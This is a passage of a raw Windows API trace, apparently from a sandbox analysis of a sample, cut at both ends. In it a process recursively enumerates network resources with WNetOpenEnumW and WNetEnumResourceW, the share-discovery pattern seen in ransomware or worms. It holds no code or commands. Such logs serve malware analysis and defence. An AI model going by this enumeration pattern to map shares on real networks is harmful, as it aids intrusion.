lpBuffer=0x40a8068, lpBufferSize=0x348f474) returned 0x0 [0191.557] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40bc078 [0191.557] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x40c0080 [0191.558] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40a8068, lphEnum=0x348f43c | out: lphEnum=0x348f43c*=0x28da10) returned 0x0 [0191.560] WNetEnumResourceW (in: hEnum=0x28da10, lpcCount=0x348f444, lpBuffer=0x40bc078, lpBufferSize=0x348f434 | out: lpcCount=0x348f444, lpBuffer=0x40bc078, lpBufferSize=0x348f434) returned 0x0 [0191.560] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40d0088 [0191.560] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x40d4090 [0191.560] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40bc078, lphEnum=0x348f3fc | out: lphEnum=0x348f3fc*=0x28da68) returned 0x0 [0191.562] WNetEnumResourceW (in: hEnum=0x28da68, lpcCount=0x348f404, lpBuffer=0x40d0088, lpBufferSize=0x348f3f4 | out: lpcCount=0x348f404, lpBuffer=0x40d0088, lpBufferSize=0x348f3f4) returned 0x0 [0191.562] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40e4098 [0191.562] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x40e80a0 [0191.563] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40d0088, lphEnum=0x348f3bc | out: lphEnum=0x348f3bc*=0x28dac0) returned 0x0 [0191.565] WNetEnumResourceW (in: hEnum=0x28dac0, lpcCount=0x348f3c4, lpBuffer=0x40e4098, lpBufferSize=0x348f3b4 | out: lpcCount=0x348f3c4, lpBuffer=0x40e4098, lpBufferSize=0x348f3b4) returned 0x0 [0191.565] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x40f80a8 [0191.565] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x40fc0b0 [0191.566] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40e4098, lphEnum=0x348f37c | out: lphEnum=0x348f37c*=0x28db18) returned 0x0 [0191.568] WNetEnumResourceW (in: hEnum=0x28db18, lpcCount=0x348f384, lpBuffer=0x40f80a8, lpBufferSize=0x348f374 | out: lpcCount=0x348f384, lpBuffer=0x40f80a8, lpBufferSize=0x348f374) returned 0x0 [0191.568] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x410c0b8 [0191.568] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41100c0 [0191.568] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x40f80a8, lphEnum=0x348f33c | out: lphEnum=0x348f33c*=0x28db70) returned 0x0 [0191.570] WNetEnumResourceW (in: hEnum=0x28db70, lpcCount=0x348f344, lpBuffer=0x410c0b8, lpBufferSize=0x348f334 | out: lpcCount=0x348f344, lpBuffer=0x410c0b8, lpBufferSize=0x348f334) returned 0x0 [0191.570] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x41200c8 [0191.570] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41240d0 [0191.571] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x410c0b8, lphEnum=0x348f2fc | out: lphEnum=0x348f2fc*=0x28dbc8) returned 0x0 [0191.573] WNetEnumResourceW (in: hEnum=0x28dbc8, lpcCount=0x348f304, lpBuffer=0x41200c8, lpBufferSize=0x348f2f4 | out: lpcCount=0x348f304, lpBuffer=0x41200c8, lpBufferSize=0x348f2f4) returned 0x0 [0191.573] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x41340d8 [0191.574] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41380e0 [0191.574] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x41200c8, lphEnum=0x348f2bc | out: lphEnum=0x348f2bc*=0x28dc20) returned 0x0 [0191.577] WNetEnumResourceW (in: hEnum=0x28dc20, lpcCount=0x348f2c4, lpBuffer=0x41340d8, lpBufferSize=0x348f2b4 | out: lpcCount=0x348f2c4, lpBuffer=0x41340d8, lpBufferSize=0x348f2b4) returned 0x0 [0191.577] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x41480e8 [0191.577] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x414c0f0 [0191.577] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x41340d8, lphEnum=0x348f27c | out: lphEnum=0x348f27c*=0x28dc78) returned 0x0 [0191.580] WNetEnumResourceW (in: hEnum=0x28dc78, lpcCount=0x348f284, lpBuffer=0x41480e8, lpBufferSize=0x348f274 | out: lpcCount=0x348f284, lpBuffer=0x41480e8, lpBufferSize=0x348f274) returned 0x0 [0191.580] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x415c0f8 [0191.580] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4160100 [0191.580] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x41480e8, lphEnum=0x348f23c | out: lphEnum=0x348f23c*=0x28dcd0) returned 0x0 [0191.583] WNetEnumResourceW (in: hEnum=0x28dcd0, lpcCount=0x348f244, lpBuffer=0x415c0f8, lpBufferSize=0x348f234 | out: lpcCount=0x348f244, lpBuffer=0x415c0f8, lpBufferSize=0x348f234) returned 0x0 [0191.583] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4170108 [0191.583] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4174110 [0191.584] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x415c0f8, lphEnum=0x348f1fc | out: lphEnum=0x348f1fc*=0x28dd28) returned 0x0 [0191.586] WNetEnumResourceW (in: hEnum=0x28dd28, lpcCount=0x348f204, lpBuffer=0x4170108, lpBufferSize=0x348f1f4 | out: lpcCount=0x348f204, lpBuffer=0x4170108, lpBufferSize=0x348f1f4) returned 0x0 [0191.586] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4184118 [0191.586] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3490048 [0191.587] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4170108, lphEnum=0x348f1bc | out: lphEnum=0x348f1bc*=0x28dd80) returned 0x0 [0191.590] WNetEnumResourceW (in: hEnum=0x28dd80, lpcCount=0x348f1c4, lpBuffer=0x4184118, lpBufferSize=0x348f1b4 | out: lpcCount=0x348f1c4, lpBuffer=0x4184118, lpBufferSize=0x348f1b4) returned 0x0 [0191.590] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4188120 [0191.590] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x34a0050 [0191.590] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4184118, lphEnum=0x348f17c | out: lphEnum=0x348f17c*=0x28ddd8) returned 0x0 [0191.593] WNetEnumResourceW (in: hEnum=0x28ddd8, lpcCount=0x348f184, lpBuffer=0x4188120, lpBufferSize=0x348f174 | out: lpcCount=0x348f184, lpBuffer=0x4188120, lpBufferSize=0x348f174) returned 0x0 [0191.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x34b0058 [0191.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x34b4060 [0191.594] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4188120, lphEnum=0x348f13c | out: lphEnum=0x348f13c*=0x28de30) returned 0x0 [0191.596] WNetEnumResourceW (in: hEnum=0x28de30, lpcCount=0x348f144, lpBuffer=0x34b0058, lpBufferSize=0x348f134 | out: lpcCount=0x348f144, lpBuffer=0x34b0058, lpBufferSize=0x348f134) returned 0x0 [0191.596] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x34c4068 [0191.596] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x34c8070 [0191.597] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x34b0058, lphEnum=0x348f0fc | out: lphEnum=0x348f0fc*=0x28de88) returned 0x0 [0191.727] WNetEnumResourceW (in: hEnum=0x28de88, lpcCount=0x348f104, lpBuffer=0x34c4068, lpBufferSize=0x348f0f4 | out: lpcCount=0x348f104, lpBuffer=0x34c4068, lpBufferSize=0x348f0f4) returned 0x0 [0191.727] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x34d8078 [0191.727] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x34dc080 [0191.727] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x34c4068, lphEnum=0x348f0bc | out: lphEnum=0x348f0bc*=0x28dee0) returned 0x0 [0191.730] WNetEnumResourceW (in: hEnum=0x28dee0, lpcCount=0x348f0c4, lpBuffer=0x34d8078, lpBufferSize=0x348f0b4 | out: lpcCount=0x348f0c4, lpBuffer=0x34d8078, lpBufferSize=0x348f0b4) returned 0x0 [0191.730] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x34ec088 [0191.730] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x34f0090 [0191.731] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x34d8078, lphEnum=0x348f07c | out: lphEnum=0x348f07c*=0x28df38) returned 0x0 [0191.733] WNetEnumResourceW (in: hEnum=0x28df38, lpcCount=0x348f084, lpBuffer=0x34ec088, lpBufferSize=0x348f074 | out: lpcCount=0x348f084, lpBuffer=0x34ec088, lpBufferSize=0x348f074) returned 0x0 [0191.733] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3500098 [0191.733] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35040a0 [0191.733] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x34ec088, lphEnum=0x348f03c | out: lphEnum=0x348f03c*=0x28df90) returned 0x0 [0191.739] WNetEnumResourceW (in: hEnum=0x28df90, lpcCount=0x348f044, lpBuffer=0x3500098, lpBufferSize=0x348f034 | out: lpcCount=0x348f044, lpBuffer=0x3500098, lpBufferSize=0x348f034) returned 0x0 [0191.739] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35140a8 [0191.739] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35180b0 [0191.739] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3500098, lphEnum=0x348effc | out: lphEnum=0x348effc*=0x28dfe8) returned 0x0 [0191.742] WNetEnumResourceW (in: hEnum=0x28dfe8, lpcCount=0x348f004, lpBuffer=0x35140a8, lpBufferSize=0x348eff4 | out: lpcCount=0x348f004, lpBuffer=0x35140a8, lpBufferSize=0x348eff4) returned 0x0 [0191.742] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35280b8 [0191.742] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x352c0c0 [0191.742] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35140a8, lphEnum=0x348efbc | out: lphEnum=0x348efbc*=0x28e040) returned 0x0 [0191.744] WNetEnumResourceW (in: hEnum=0x28e040, lpcCount=0x348efc4, lpBuffer=0x35280b8, lpBufferSize=0x348efb4 | out: lpcCount=0x348efc4, lpBuffer=0x35280b8, lpBufferSize=0x348efb4) returned 0x0 [0191.744] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x353c0c8 [0191.744] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35400d0 [0191.745] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35280b8, lphEnum=0x348ef7c | out: lphEnum=0x348ef7c*=0x28e098) returned 0x0 [0191.749] WNetEnumResourceW (in: hEnum=0x28e098, lpcCount=0x348ef84, lpBuffer=0x353c0c8, lpBufferSize=0x348ef74 | out: lpcCount=0x348ef84, lpBuffer=0x353c0c8, lpBufferSize=0x348ef74) returned 0x0 [0191.749] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35500d8 [0191.749] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35540e0 [0191.750] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x353c0c8, lphEnum=0x348ef3c | out: lphEnum=0x348ef3c*=0x28e0f0) returned 0x0 [0191.752] WNetEnumResourceW (in: hEnum=0x28e0f0, lpcCount=0x348ef44, lpBuffer=0x35500d8, lpBufferSize=0x348ef34 | out: lpcCount=0x348ef44, lpBuffer=0x35500d8, lpBufferSize=0x348ef34) returned 0x0 [0191.752] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35640e8 [0191.752] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35680f0 [0191.752] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35500d8, lphEnum=0x348eefc | out: lphEnum=0x348eefc*=0x28e148) returned 0x0 [0191.755] WNetEnumResourceW (in: hEnum=0x28e148, lpcCount=0x348ef04, lpBuffer=0x35640e8, lpBufferSize=0x348eef4 | out: lpcCount=0x348ef04, lpBuffer=0x35640e8, lpBufferSize=0x348eef4) returned 0x0 [0191.755] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35780f8 [0191.755] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x357c100 [0191.755] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35640e8, lphEnum=0x348eebc | out: lphEnum=0x348eebc*=0x28e1a0) returned 0x0 [0191.757] WNetEnumResourceW (in: hEnum=0x28e1a0, lpcCount=0x348eec4, lpBuffer=0x35780f8, lpBufferSize=0x348eeb4 | out: lpcCount=0x348eec4, lpBuffer=0x35780f8, lpBufferSize=0x348eeb4) returned 0x0 [0191.758] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x358c108 [0191.758] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3590110 [0191.758] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35780f8, lphEnum=0x348ee7c | out: lphEnum=0x348ee7c*=0x28e310) returned 0x0 [0192.203] WNetEnumResourceW (in: hEnum=0x28e310, lpcCount=0x348ee84, lpBuffer=0x358c108, lpBufferSize=0x348ee74 | out: lpcCount=0x348ee84, lpBuffer=0x358c108, lpBufferSize=0x348ee74) returned 0x0 [0192.203] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35a0118 [0192.203] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35a4120 [0192.203] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x358c108, lphEnum=0x348ee3c | out: lphEnum=0x348ee3c*=0x28e368) returned 0x0 [0192.205] WNetEnumResourceW (in: hEnum=0x28e368, lpcCount=0x348ee44, lpBuffer=0x35a0118, lpBufferSize=0x348ee34 | out: lpcCount=0x348ee44, lpBuffer=0x35a0118, lpBufferSize=0x348ee34) returned 0x0 [0192.205] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35b4128 [0192.205] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35b8130 [0192.206] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35a0118, lphEnum=0x348edfc | out: lphEnum=0x348edfc*=0x28e3c0) returned 0x0 [0192.207] WNetEnumResourceW (in: hEnum=0x28e3c0, lpcCount=0x348ee04, lpBuffer=0x35b4128, lpBufferSize=0x348edf4 | out: lpcCount=0x348ee04, lpBuffer=0x35b4128, lpBufferSize=0x348edf4) returned 0x0 [0192.207] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35c8138 [0192.207] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35cc140 [0192.208] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35b4128, lphEnum=0x348edbc | out: lphEnum=0x348edbc*=0x28e418) returned 0x0 [0192.209] WNetEnumResourceW (in: hEnum=0x28e418, lpcCount=0x348edc4, lpBuffer=0x35c8138, lpBufferSize=0x348edb4 | out: lpcCount=0x348edc4, lpBuffer=0x35c8138, lpBufferSize=0x348edb4) returned 0x0 [0192.209] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35dc148 [0192.210] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35e0150 [0192.210] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35c8138, lphEnum=0x348ed7c | out: lphEnum=0x348ed7c*=0x28e470) returned 0x0 [0192.212] WNetEnumResourceW (in: hEnum=0x28e470, lpcCount=0x348ed84, lpBuffer=0x35dc148, lpBufferSize=0x348ed74 | out: lpcCount=0x348ed84, lpBuffer=0x35dc148, lpBufferSize=0x348ed74) returned 0x0 [0192.212] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x35f0158 [0192.212] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x35f4160 [0192.212] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35dc148, lphEnum=0x348ed3c | out: lphEnum=0x348ed3c*=0x28e4c8) returned 0x0 [0192.214] WNetEnumResourceW (in: hEnum=0x28e4c8, lpcCount=0x348ed44, lpBuffer=0x35f0158, lpBufferSize=0x348ed34 | out: lpcCount=0x348ed44, lpBuffer=0x35f0158, lpBufferSize=0x348ed34) returned 0x0 [0192.214] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3604168 [0192.214] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3608170 [0192.214] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x35f0158, lphEnum=0x348ecfc | out: lphEnum=0x348ecfc*=0x28e520) returned 0x0 [0192.216] WNetEnumResourceW (in: hEnum=0x28e520, lpcCount=0x348ed04, lpBuffer=0x3604168, lpBufferSize=0x348ecf4 | out: lpcCount=0x348ed04, lpBuffer=0x3604168, lpBufferSize=0x348ecf4) returned 0x0 [0192.216] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3618178 [0192.217] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x361c180 [0192.217] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3604168, lphEnum=0x348ecbc | out: lphEnum=0x348ecbc*=0x28e578) returned 0x0 [0192.219] WNetEnumResourceW (in: hEnum=0x28e578, lpcCount=0x348ecc4, lpBuffer=0x3618178, lpBufferSize=0x348ecb4 | out: lpcCount=0x348ecc4, lpBuffer=0x3618178, lpBufferSize=0x348ecb4) returned 0x0 [0192.219] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x362c188 [0192.219] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3630190 [0192.219] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3618178, lphEnum=0x348ec7c | out: lphEnum=0x348ec7c*=0x28e5d0) returned 0x0 [0192.221] WNetEnumResourceW (in: hEnum=0x28e5d0, lpcCount=0x348ec84, lpBuffer=0x362c188, lpBufferSize=0x348ec74 | out: lpcCount=0x348ec84, lpBuffer=0x362c188, lpBufferSize=0x348ec74) returned 0x0 [0192.221] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3640198 [0192.221] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36441a0 [0192.221] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x362c188, lphEnum=0x348ec3c | out: lphEnum=0x348ec3c*=0x28e628) returned 0x0 [0192.223] WNetEnumResourceW (in: hEnum=0x28e628, lpcCount=0x348ec44, lpBuffer=0x3640198, lpBufferSize=0x348ec34 | out: lpcCount=0x348ec44, lpBuffer=0x3640198, lpBufferSize=0x348ec34) returned 0x0 [0192.223] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36541a8 [0192.223] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36581b0 [0192.224] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3640198, lphEnum=0x348ebfc | out: lphEnum=0x348ebfc*=0x28e680) returned 0x0 [0192.225] WNetEnumResourceW (in: hEnum=0x28e680, lpcCount=0x348ec04, lpBuffer=0x36541a8, lpBufferSize=0x348ebf4 | out: lpcCount=0x348ec04, lpBuffer=0x36541a8, lpBufferSize=0x348ebf4) returned 0x0 [0192.225] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36681b8 [0192.225] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x366c1c0 [0192.226] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36541a8, lphEnum=0x348ebbc | out: lphEnum=0x348ebbc*=0x28e6d8) returned 0x0 [0192.227] WNetEnumResourceW (in: hEnum=0x28e6d8, lpcCount=0x348ebc4, lpBuffer=0x36681b8, lpBufferSize=0x348ebb4 | out: lpcCount=0x348ebc4, lpBuffer=0x36681b8, lpBufferSize=0x348ebb4) returned 0x0 [0192.227] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x367c1c8 [0192.228] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36801d0 [0192.228] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36681b8, lphEnum=0x348eb7c | out: lphEnum=0x348eb7c*=0x28e730) returned 0x0 [0192.230] WNetEnumResourceW (in: hEnum=0x28e730, lpcCount=0x348eb84, lpBuffer=0x367c1c8, lpBufferSize=0x348eb74 | out: lpcCount=0x348eb84, lpBuffer=0x367c1c8, lpBufferSize=0x348eb74) returned 0x0 [0192.230] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36901d8 [0192.230] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36941e0 [0192.230] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x367c1c8, lphEnum=0x348eb3c | out: lphEnum=0x348eb3c*=0x28e788) returned 0x0 [0192.232] WNetEnumResourceW (in: hEnum=0x28e788, lpcCount=0x348eb44, lpBuffer=0x36901d8, lpBufferSize=0x348eb34 | out: lpcCount=0x348eb44, lpBuffer=0x36901d8, lpBufferSize=0x348eb34) returned 0x0 [0192.232] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36a41e8 [0192.232] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36a81f0 [0192.232] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36901d8, lphEnum=0x348eafc | out: lphEnum=0x348eafc*=0x28e7e0) returned 0x0 [0192.234] WNetEnumResourceW (in: hEnum=0x28e7e0, lpcCount=0x348eb04, lpBuffer=0x36a41e8, lpBufferSize=0x348eaf4 | out: lpcCount=0x348eb04, lpBuffer=0x36a41e8, lpBufferSize=0x348eaf4) returned 0x0 [0192.234] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36b81f8 [0192.234] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36bc200 [0192.234] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36a41e8, lphEnum=0x348eabc | out: lphEnum=0x348eabc*=0x28e838) returned 0x0 [0192.236] WNetEnumResourceW (in: hEnum=0x28e838, lpcCount=0x348eac4, lpBuffer=0x36b81f8, lpBufferSize=0x348eab4 | out: lpcCount=0x348eac4, lpBuffer=0x36b81f8, lpBufferSize=0x348eab4) returned 0x0 [0192.236] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36cc208 [0192.236] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36d0210 [0192.236] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36b81f8, lphEnum=0x348ea7c | out: lphEnum=0x348ea7c*=0x28e890) returned 0x0 [0192.238] WNetEnumResourceW (in: hEnum=0x28e890, lpcCount=0x348ea84, lpBuffer=0x36cc208, lpBufferSize=0x348ea74 | out: lpcCount=0x348ea84, lpBuffer=0x36cc208, lpBufferSize=0x348ea74) returned 0x0 [0192.238] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36e0218 [0192.238] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36e4220 [0192.239] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36cc208, lphEnum=0x348ea3c | out: lphEnum=0x348ea3c*=0x28e8e8) returned 0x0 [0192.240] WNetEnumResourceW (in: hEnum=0x28e8e8, lpcCount=0x348ea44, lpBuffer=0x36e0218, lpBufferSize=0x348ea34 | out: lpcCount=0x348ea44, lpBuffer=0x36e0218, lpBufferSize=0x348ea34) returned 0x0 [0192.240] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x36f4228 [0192.240] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x36f8230 [0192.241] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36e0218, lphEnum=0x348e9fc | out: lphEnum=0x348e9fc*=0x28e940) returned 0x0 [0192.242] WNetEnumResourceW (in: hEnum=0x28e940, lpcCount=0x348ea04, lpBuffer=0x36f4228, lpBufferSize=0x348e9f4 | out: lpcCount=0x348ea04, lpBuffer=0x36f4228, lpBufferSize=0x348e9f4) returned 0x0 [0192.242] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3708238 [0192.242] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x370c240 [0192.243] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x36f4228, lphEnum=0x348e9bc | out: lphEnum=0x348e9bc*=0x28e998) returned 0x0 [0192.244] WNetEnumResourceW (in: hEnum=0x28e998, lpcCount=0x348e9c4, lpBuffer=0x3708238, lpBufferSize=0x348e9b4 | out: lpcCount=0x348e9c4, lpBuffer=0x3708238, lpBufferSize=0x348e9b4) returned 0x0 [0192.244] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x371c248 [0192.244] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3720250 [0192.245] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3708238, lphEnum=0x348e97c | out: lphEnum=0x348e97c*=0x28e9f0) returned 0x0 [0192.247] WNetEnumResourceW (in: hEnum=0x28e9f0, 